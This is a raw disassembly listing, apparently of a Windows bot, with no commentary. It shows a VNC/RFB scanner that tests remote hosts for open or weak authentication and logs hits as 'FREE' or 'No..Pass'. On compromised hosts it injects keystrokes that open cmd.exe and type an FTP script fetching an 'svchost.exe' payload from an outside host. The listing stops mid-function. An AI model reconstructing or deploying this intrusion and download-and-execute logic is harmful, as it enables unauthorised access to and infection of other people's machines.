; =============== S U B R O U T I N E =======================================
sub_40CD30 proc near ; CODE XREF: .text:0040D3CE�p
; .text:0040D493�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
test esi, esi
push edi
mov edi, [esp+8+arg_4]
jle short loc_40CD4C
push esi
push edi
push [esp+10h+arg_0]
call sub_40CCB2
add esp, 0Ch
loc_40CD4C: ; CODE XREF: sub_40CD30+C�j
and byte ptr [edi+esi], 0
pop edi
pop esi
retn
sub_40CD30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD53 proc near ; CODE XREF: sub_40CDF0+30�p
; sub_40CDF0+47�p ...
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
inc edi
push edi
lea eax, [ebp+var_8]
push 4
push eax
call sub_40D7B0
xor ebx, ebx
add esp, 0Ch
cmp [ebp+arg_C], ebx
jz short loc_40CD7D
cmp [ebp+arg_C], edi
jz short loc_40CD7D
push edi
push edi
jmp short loc_40CD81
; ---------------------------------------------------------------------------
loc_40CD7D: ; CODE XREF: sub_40CD53+1F�j
; sub_40CD53+24�j
push edi
push [ebp+arg_C]
loc_40CD81: ; CODE XREF: sub_40CD53+28�j
lea eax, [ebp+var_7]
push eax
call sub_40D7B0
add esp, 0Ch
push 4
lea eax, [ebp+var_6]
push ebx
push eax
call sub_40D7B0
movsx eax, [ebp+arg_4]
push edi
push eax
lea eax, [ebp+var_2]
push eax
call sub_40D7B0
movsx eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_1]
push eax
call sub_40D7B0
mov esi, dword_419258
add esp, 24h
push ebx
push 8
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call esi ; send
cmp [ebp+arg_C], edi
jle short loc_40CDEB
push edi
lea eax, [ebp+var_7]
push ebx
push eax
call sub_40D7B0
add esp, 0Ch
push ebx
push 8
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call esi ; send
loc_40CDEB: ; CODE XREF: sub_40CD53+7C�j
pop edi
pop esi
pop ebx
leave
retn
sub_40CD53 endp
; =============== S U B R O U T I N E =======================================
sub_40CDF0 proc near ; CODE XREF: .text:0040D4F5�p
; .text:0040D5FE�p
var_24 = dword ptr -24h
var_20 = byte ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 24h
push ebx
push ebp
push esi
push edi
push 7
pop ecx
mov esi, offset aSystemrootSyst ; "%systemroot%\\system32\\cmd.exe"
lea edi, [esp+34h+var_20]
rep movsd
movsw
mov esi, dword_419060
mov ebx, 7D0h
push ebx
call esi ; Sleep
mov edi, [esp+34h+arg_0]
push 2
push 0Dh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
mov ebp, 1F4h
push ebp
call esi ; Sleep
push 1
push 0FFFFFFE3h
push 0FFFFFFFFh
push edi
call sub_40CD53
push 1
push 0FFFFFFE9h
push 0FFFFFFFFh
push edi
call sub_40CD53
push 1
push 0FFFFFF9Fh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 30h
push 64h
call esi ; Sleep
push 0
push 0FFFFFF9Fh
push 0FFFFFFFFh
push edi
call sub_40CD53
push 0
push 0FFFFFFE9h
push 0FFFFFFFFh
push edi
call sub_40CD53
push 0
push 0FFFFFFE3h
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 30h
push ebx
call esi ; Sleep
mov [esp+34h+var_24], 4
loc_40CE8D: ; CODE XREF: sub_40CDF0+B3�j
push 2
push 54h
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebp
call esi ; Sleep
dec [esp+34h+var_24]
jnz short loc_40CE8D
push 2
push 0Dh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebx
call esi ; Sleep
push 2
push 0FFFFFFE9h
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebp
call esi ; Sleep
push 2
push 54h
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebp
call esi ; Sleep
push 2
push 0Dh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebx
call esi ; Sleep
lea eax, [esp+34h+var_20]
push eax
xor ebp, ebp
call sub_40D630
test eax, eax
pop ecx
jbe short loc_40CF26
loc_40CEFE: ; CODE XREF: sub_40CDF0+134�j
xor eax, eax
mov al, [esp+ebp+34h+var_20]
push 2
push eax
push 0
push edi
call sub_40CD53
add esp, 10h
push 7Dh
call esi ; Sleep
lea eax, [esp+34h+var_20]
push eax
inc ebp
call sub_40D630
cmp ebp, eax
pop ecx
jb short loc_40CEFE
loc_40CF26: ; CODE XREF: sub_40CDF0+10C�j
push 2
push 0Dh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebx
call esi ; Sleep
push [esp+34h+arg_4]
xor ebp, ebp
call sub_40D630
test eax, eax
pop ecx
jbe short loc_40CF71
loc_40CF48: ; CODE XREF: sub_40CDF0+17F�j
mov eax, [esp+34h+arg_4]
movsx eax, byte ptr [eax+ebp]
push 2
push eax
push 0
push edi
call sub_40CD53
add esp, 10h
push 7Dh
call esi ; Sleep
push [esp+34h+arg_4]
inc ebp
call sub_40D630
cmp ebp, eax
pop ecx
jb short loc_40CF48
loc_40CF71: ; CODE XREF: sub_40CDF0+156�j
push 2
push 0Dh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
push ebx
call esi ; Sleep
push 2
push 0Dh
push 0FFFFFFFFh
push edi
call sub_40CD53
add esp, 10h
pop edi
pop esi
pop ebp
pop ebx
add esp, 24h
retn
sub_40CDF0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 498h
push ebx
push esi
push edi
xor esi, esi
xor edi, edi
inc esi
mov [ebp-18h], edi
mov [ebp-10h], esi
mov [ebp-24h], edi
call dword_4190A8 ; GetTickCount
push eax
call sub_40E043
call sub_40E04D
push 0Eh
pop ecx
xor edx, edx
div ecx
mov eax, offset aSvchost_exe ; "svchost.exe"
push eax
push eax
push offset aPassword ; "password"
push offset aMircosoft ; "mircosoft"
push dword_41E264
lea eax, [ebp-498h]
push offset aMs_microsoft_c ; "ms.microsoft.com"
push offset aCmdKEchoOpenSD ; "cmd /k echo open %s %d > o&echo user %s"...
push 100h
push eax
mov [ebp-0Ch], edx
call sub_40DFEC
add esp, 28h
push edi
push esi
push 2
call dword_419238 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40D32A
mov ebx, 0FF0000h
mov esi, 0FF00h
loc_40D023: ; CODE XREF: .text:0040D324�j
lea eax, [ebp+0Ch]
push eax
call dword_4C4704
push dword ptr [ebp+0A8h]
mov [ebp-88h], eax
mov word ptr [ebp-8Ch], 2
call dword_4C47DC
mov [ebp-8Ah], ax
push 10h
lea eax, [ebp-8Ch]
push eax
push edi
call dword_41923C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40D32A
push 0Ch
lea eax, [ebp-7Ch]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D32A
and byte ptr [ebp-70h], 0
lea eax, [ebp-8]
push eax
lea eax, [ebp-14h]
push eax
lea eax, [ebp-7Ch]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_40DCA4
add esp, 10h
cmp eax, 2
jnz loc_40D32A
push 3
pop eax
cmp [ebp-14h], eax
jnz short loc_40D0D8
cmp [ebp-8], eax
jl loc_40D32A
cmp dword ptr [ebp-8], 8
jnz short loc_40D0D8
cmp dword ptr [ebp-10h], 0
jz short loc_40D0D8
push 8
push eax
lea eax, [ebp-7Ch]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_40D6BB
add esp, 10h
jmp short loc_40D0F0
; ---------------------------------------------------------------------------
loc_40D0D8: ; CODE XREF: .text:0040D0AB�j
; .text:0040D0BA�j ...
push 5
push eax
lea eax, [ebp-7Ch]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_40D6BB
add esp, 10h
and dword ptr [ebp-10h], 0
loc_40D0F0: ; CODE XREF: .text:0040D0D6�j
push 0Ch
lea eax, [ebp-7Ch]
push eax
push edi
call sub_40CCEB
add esp, 0Ch
test eax, eax
jz loc_40D32A
cmp dword ptr [ebp-10h], 0
lea eax, [ebp-1Ch]
jz short loc_40D18C
and dword ptr [ebp-10h], 0
push 2
push eax
push edi
mov word ptr [ebp-20h], 1
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D32A
push 1
lea eax, [ebp-20h]
push eax
push edi
call sub_40CCEB
add esp, 0Ch
test eax, eax
jz loc_40D32A
push 4
lea eax, [ebp-4]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz short loc_40D180
mov eax, [ebp-4]
mov ecx, eax
mov edx, eax
shr edx, 10h
and ecx, ebx
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, esi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp-4], ecx
jz loc_40D331
loc_40D180: ; CODE XREF: .text:0040D156�j
push edi
call dword_419240 ; closesocket
jmp loc_40D2D0
; ---------------------------------------------------------------------------
loc_40D18C: ; CODE XREF: .text:0040D10E�j
push 4
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D32A
mov ecx, [ebp-1Ch]
mov eax, ecx
and eax, ebx
mov edx, ecx
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-1Ch], eax
sub eax, 0
jz loc_40D2D7
dec eax
jz loc_40D50E
dec eax
jnz loc_40D3E8
push 10h
lea eax, [ebp-9Ch]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D32A
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 0Eh
jnz short loc_40D200
and dword ptr [ebp-0Ch], 0
loc_40D200: ; CODE XREF: .text:0040D1FA�j
mov eax, [ebp-0Ch]
push 0FFh
push off_420F34[eax*4]
lea eax, [ebp-1A4h]
push eax
call sub_40DB80
lea eax, [ebp-1A4h]
push eax
call sub_40D630
and byte ptr [ebp+eax-1A4h], 0
lea eax, [ebp-1A4h]
push eax
lea eax, [ebp-0A4h]
push eax
call sub_40CC65
lea eax, [ebp-1A4h]
push eax
lea eax, [ebp-9Ch]
push eax
call sub_40CC0B
push 10h
lea eax, [ebp-9Ch]
push eax
push edi
call sub_40CCEB
add esp, 2Ch
test eax, eax
jz loc_40D32A
push 4
lea eax, [ebp-4]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D32A
mov ecx, [ebp-4]
mov eax, ecx
and eax, ebx
mov edx, ecx
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-4], eax
sub eax, 0
jz loc_40D3F6
dec eax
push edi
jnz loc_40D3E9
and dword ptr [ebp-18h], 0
call dword_419240 ; closesocket
inc dword ptr [ebp-24h]
cmp dword ptr [ebp-24h], 0Eh
jz loc_40D3EF
loc_40D2D0: ; CODE XREF: .text:0040D187�j
push 1388h
jmp short loc_40D2F0
; ---------------------------------------------------------------------------
loc_40D2D7: ; CODE XREF: .text:0040D1C5�j
push edi
call dword_419240 ; closesocket
inc dword ptr [ebp-18h]
cmp dword ptr [ebp-18h], 2
jz loc_40D3EF
push 7D0h
loc_40D2F0: ; CODE XREF: .text:0040D2D5�j
call dword_419060 ; Sleep
cmp edi, 0FFFFFFFFh
jz short loc_40D30B
push 2
push edi
call dword_419228 ; shutdown
push edi
call dword_419240 ; closesocket
loc_40D30B: ; CODE XREF: .text:0040D2F9�j
push 64h
call dword_419060 ; Sleep
push 0
push 1
push 2
call dword_419238 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz loc_40D023
loc_40D32A: ; CODE XREF: .text:0040D013�j
; .text:0040D062�j ...
xor esi, esi
jmp loc_40D500
; ---------------------------------------------------------------------------
loc_40D331: ; CODE XREF: .text:0040D17A�j
push 1
push offset dword_419388
push edi
call sub_40CCEB
add esp, 0Ch
test eax, eax
jz loc_40D4FD
push 18h
lea eax, [ebp-6Ch]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D4FD
movzx ax, byte ptr [ebp-6Bh]
mov ah, [ebp-6Ch]
mov ecx, [ebp-58h]
mov edx, ecx
shr edx, 10h
mov [ebp-6Ch], ax
movzx ax, byte ptr [ebp-69h]
mov ah, [ebp-6Ah]
mov [ebp-6Ah], ax
movzx ax, byte ptr [ebp-63h]
mov ah, [ebp-64h]
mov [ebp-64h], ax
movzx ax, byte ptr [ebp-61h]
mov ah, [ebp-62h]
mov [ebp-62h], ax
movzx ax, byte ptr [ebp-5Fh]
mov ah, [ebp-60h]
mov [ebp-60h], ax
mov eax, ecx
and eax, ebx
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-58h], eax
add eax, 2
push eax
call sub_40F6C6
push dword ptr [ebp-58h]
mov esi, eax
push esi
push edi
call sub_40CD30
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-8]
push dword ptr [ebp-14h]
push offset aV_n_cD_DSSFree ; "V.N.C%d.%d %s: %s - FREE"
jmp loc_40D5B8
; ---------------------------------------------------------------------------
loc_40D3E8: ; CODE XREF: .text:0040D1D3�j
push edi
loc_40D3E9: ; CODE XREF: .text:0040D2B3�j
call dword_419240 ; closesocket
loc_40D3EF: ; CODE XREF: .text:0040D2CA�j
; .text:0040D2E5�j
xor eax, eax
loc_40D3F1: ; CODE XREF: .text:0040D509�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40D3F6: ; CODE XREF: .text:0040D2AB�j
push 1
push offset dword_419388
push edi
call sub_40CCEB
add esp, 0Ch
test eax, eax
jz loc_40D4FD
push 18h
lea eax, [ebp-3Ch]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz loc_40D4FD
movzx ax, byte ptr [ebp-3Bh]
mov ah, [ebp-3Ch]
mov ecx, [ebp-28h]
mov edx, ecx
shr edx, 10h
mov [ebp-3Ch], ax
movzx ax, byte ptr [ebp-39h]
mov ah, [ebp-3Ah]
mov [ebp-3Ah], ax
movzx ax, byte ptr [ebp-33h]
mov ah, [ebp-34h]
mov [ebp-34h], ax
movzx ax, byte ptr [ebp-31h]
mov ah, [ebp-32h]
mov [ebp-32h], ax
movzx ax, byte ptr [ebp-2Fh]
mov ah, [ebp-30h]
mov [ebp-30h], ax
mov eax, ecx
and eax, ebx
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-28h], eax
add eax, 2
push eax
call sub_40F6C6
push dword ptr [ebp-28h]
mov esi, eax
push esi
push edi
call sub_40CD30
lea eax, [ebp-1A4h]
push eax
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-8]
mov esi, 1F4h
push dword ptr [ebp-14h]
lea eax, [ebp-398h]
push offset aV_n_cD_DSSS ; "V.N.C%d.%d %s: %s - %s"
push esi
push eax
call sub_40DFEC
push dword ptr [ebp+0B8h]
lea eax, [ebp-398h]
push eax
push offset dword_41E1B4
push dword ptr [ebp+8]
call sub_4017B6
add esp, 40h
push esi
lea eax, [ebp-398h]
push 0
push eax
call sub_40D7B0
lea eax, [ebp-498h]
push eax
push edi
call sub_40CDF0
add esp, 14h
loc_40D4FD: ; CODE XREF: .text:0040D343�j
; .text:0040D35A�j ...
xor esi, esi
inc esi
loc_40D500: ; CODE XREF: .text:0040D32C�j
push edi
call dword_419240 ; closesocket
mov eax, esi
jmp loc_40D3F1
; ---------------------------------------------------------------------------
loc_40D50E: ; CODE XREF: .text:0040D1CC�j
push 1
push offset dword_419388
push edi
call sub_40CCEB
add esp, 0Ch
test eax, eax
jz short loc_40D4FD
push 18h
lea eax, [ebp-54h]
push eax
push edi
call sub_40CCB2
add esp, 0Ch
test eax, eax
jz short loc_40D4FD
movzx ax, byte ptr [ebp-53h]
mov ah, [ebp-54h]
mov ecx, [ebp-40h]
mov edx, ecx
shr edx, 10h
mov [ebp-54h], ax
movzx ax, byte ptr [ebp-51h]
mov ah, [ebp-52h]
mov [ebp-52h], ax
movzx ax, byte ptr [ebp-4Bh]
mov ah, [ebp-4Ch]
mov [ebp-4Ch], ax
movzx ax, byte ptr [ebp-49h]
mov ah, [ebp-4Ah]
mov [ebp-4Ah], ax
movzx ax, byte ptr [ebp-47h]
mov ah, [ebp-48h]
mov [ebp-48h], ax
mov eax, ecx
and eax, ebx
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-40h], eax
add eax, 2
push eax
call sub_40F6C6
push dword ptr [ebp-40h]
mov esi, eax
push esi
push edi
call sub_40CD30
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-8]
push dword ptr [ebp-14h]
push offset aV_n_cD_DSSNo__ ; "V.N.C%d.%d %s: %s - No..Pass"
loc_40D5B8: ; CODE XREF: .text:0040D3E3�j
mov esi, 1F4h
lea eax, [ebp-398h]
push esi
push eax
call sub_40DFEC
push dword ptr [ebp+0B8h]
lea eax, [ebp-398h]
push eax
push offset dword_41E1B4
push dword ptr [ebp+8]
call sub_4017B6
push esi
lea eax, [ebp-398h]
push 0
push eax
call sub_40D7B0
add esp, 48h
lea eax, [ebp-498h]
push eax
push edi
call sub_40CDF0
pop ecx
pop ecx
jmp loc_40D4FD
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D60A proc near ; CODE XREF: sub_40BEF1+5E�p
jmp dword_419218
sub_40D60A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D610 proc near ; CODE XREF: sub_401073+E7�p
jmp dword_419068
sub_40D610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D616 proc near ; CODE XREF: sub_401073+3F�p
; sub_409427+163�p
jmp dword_41907C
sub_40D616 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D61C proc near ; CODE XREF: sub_401073+26�p
; sub_4012BA+50�p ...
jmp dword_419080
sub_40D61C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D622 proc near ; CODE XREF: sub_4012BA+F5�p
; sub_40151D+F5�p
jmp dword_419088
sub_40D622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40D628 proc near ; CODE XREF: sub_4012BA+6C�p
; sub_40151D+6C�p
jmp dword_41908C
sub_40D628 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D630 proc near ; CODE XREF: start+38�p sub_401073+CE�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_40D660
loc_40D63C: ; CODE XREF: sub_40D630+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_40D693
test ecx, 3
jnz short loc_40D63C
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_40D660: ; CODE XREF: sub_40D630+A�j
; sub_40D630+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40D660
mov eax, [ecx-4]
test al, al
jz short loc_40D6B1
test ah, ah
jz short loc_40D6A7
test eax, 0FF0000h
jz short loc_40D69D
test eax, 0FF000000h
jz short loc_40D693
jmp short loc_40D660
; ---------------------------------------------------------------------------
loc_40D693: ; CODE XREF: sub_40D630+13�j
; sub_40D630+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40D69D: ; CODE XREF: sub_40D630+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40D6A7: ; CODE XREF: sub_40D630+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40D6B1: ; CODE XREF: sub_40D630+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_40D630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6BB proc near ; CODE XREF: sub_401073+C3�p
; sub_4013E5+D3�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_40FBCF
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_40D70D
dec [ebp+var_1C]
js short loc_40D700
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_40D70D
; ---------------------------------------------------------------------------
loc_40D700: ; CODE XREF: sub_40D6BB+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_40FA2B
pop ecx
pop ecx
loc_40D70D: ; CODE XREF: sub_40D6BB+36�j
; sub_40D6BB+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_40D6BB endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D720 proc near ; CODE XREF: sub_401073+5C�p
; sub_40198E+1A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_40D76C
loc_40D730: ; CODE XREF: sub_40D720+3C�j
; sub_40D720+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_40D764
or al, al
jz short loc_40D760
cmp ah, [ecx+1]
jnz short loc_40D764
or ah, ah
jz short loc_40D760
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_40D764
or al, al
jz short loc_40D760
cmp ah, [ecx+3]
jnz short loc_40D764
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_40D730
mov edi, edi
loc_40D760: ; CODE XREF: sub_40D720+18�j
; sub_40D720+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_40D764: ; CODE XREF: sub_40D720+14�j
; sub_40D720+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_40D76C: ; CODE XREF: sub_40D720+E�j
test edx, 1
jz short loc_40D78C
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_40D764
add ecx, 1
or al, al
jz short loc_40D760
test edx, 2
jz short loc_40D730
loc_40D78C: ; CODE XREF: sub_40D720+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_40D764
or al, al
jz short loc_40D760
cmp ah, [ecx+1]
jnz short loc_40D764
or ah, ah
jz short loc_40D760
add ecx, 2
jmp short loc_40D730
sub_40D720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D7B0 proc near ; CODE XREF: sub_401179+11C�p
; sub_4013E5+113�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_40D80B
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_40D7FB
neg ecx
and ecx, 3
jz short loc_40D7DD
sub edx, ecx
loc_40D7D3: ; CODE XREF: sub_40D7B0+2B�j
mov [edi], al
add edi, 1
sub ecx, 1
jnz short loc_40D7D3
loc_40D7DD: ; CODE XREF: sub_40D7B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_40D7FB
rep stosd
test edx, edx
jz short loc_40D805
loc_40D7FB: ; CODE XREF: sub_40D7B0+18�j
; sub_40D7B0+43�j ...
mov [edi], al
add edi, 1
sub edx, 1
jnz short loc_40D7FB
loc_40D805: ; CODE XREF: sub_40D7B0+49�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_40D80B: ; CODE XREF: sub_40D7B0+A�j
mov eax, [esp+arg_0]
retn
sub_40D7B0 endp
; =============== S U B R O U T I N E =======================================
sub_40D810 proc near ; CODE XREF: sub_401179+B9�p
; sub_4012BA+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40D890
mov dh, [ecx+1]
test dh, dh
jz short loc_40D87D
loc_40D828: ; CODE XREF: sub_40D810+58�j
; sub_40D810+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_40D84E
test al, al
jz short loc_40D848
loc_40D83B: ; CODE XREF: sub_40D810+36�j
mov al, [esi]
add esi, 1
loc_40D840: ; CODE XREF: sub_40D810+45�j
cmp al, dl
jz short loc_40D84E
test al, al
jnz short loc_40D83B
loc_40D848: ; CODE XREF: sub_40D810+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40D84E: ; CODE XREF: sub_40D810+25�j
; sub_40D810+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_40D840
lea edi, [esi-1]
loc_40D85A: ; CODE XREF: sub_40D810+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_40D889
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_40D828
mov al, [ecx+3]
test al, al
jz short loc_40D889
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_40D85A
jmp short loc_40D828
; ---------------------------------------------------------------------------
loc_40D87D: ; CODE XREF: sub_40D810+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_40E126
; ---------------------------------------------------------------------------
loc_40D889: ; CODE XREF: sub_40D810+4F�j
; sub_40D810+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40D890: ; CODE XREF: sub_40D810+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_40D810 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D8A0 proc near ; CODE XREF: sub_40198E+13C7�p
; sub_405E94+127�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_40D915
sub_40D8A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40D8B0 proc near ; CODE XREF: sub_401179+99�p
; sub_4013E5+97�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40D8D0
loc_40D8BD: ; CODE XREF: sub_40D8B0+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_40D903
test ecx, 3
jnz short loc_40D8BD
mov edi, edi
loc_40D8D0: ; CODE XREF: sub_40D8B0+B�j
; sub_40D8B0+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40D8D0
mov eax, [ecx-4]
test al, al
jz short loc_40D912
test ah, ah
jz short loc_40D90D
test eax, 0FF0000h
jz short loc_40D908
test eax, 0FF000000h
jz short loc_40D903
jmp short loc_40D8D0
; ---------------------------------------------------------------------------
loc_40D903: ; CODE XREF: sub_40D8B0+14�j
; sub_40D8B0+4F�j
lea edi, [ecx-1]
jmp short loc_40D915
; ---------------------------------------------------------------------------
loc_40D908: ; CODE XREF: sub_40D8B0+48�j
lea edi, [ecx-2]
jmp short loc_40D915
; ---------------------------------------------------------------------------
loc_40D90D: ; CODE XREF: sub_40D8B0+41�j
lea edi, [ecx-3]
jmp short loc_40D915
; ---------------------------------------------------------------------------
loc_40D912: ; CODE XREF: sub_40D8B0+3D�j
lea edi, [ecx-4]
loc_40D915: ; CODE XREF: sub_40D8A0+5�j
; sub_40D8B0+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_40D93E
loc_40D921: ; CODE XREF: sub_40D8B0+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_40D990
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_40D921
jmp short loc_40D93E
; ---------------------------------------------------------------------------
loc_40D939: ; CODE XREF: sub_40D8B0+A6�j
; sub_40D8B0+C0�j
mov [edi], edx
add edi, 4
loc_40D93E: ; CODE XREF: sub_40D8B0+6F�j
; sub_40D8B0+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_40D939
test dl, dl
jz short loc_40D990
test dh, dh
jz short loc_40D987
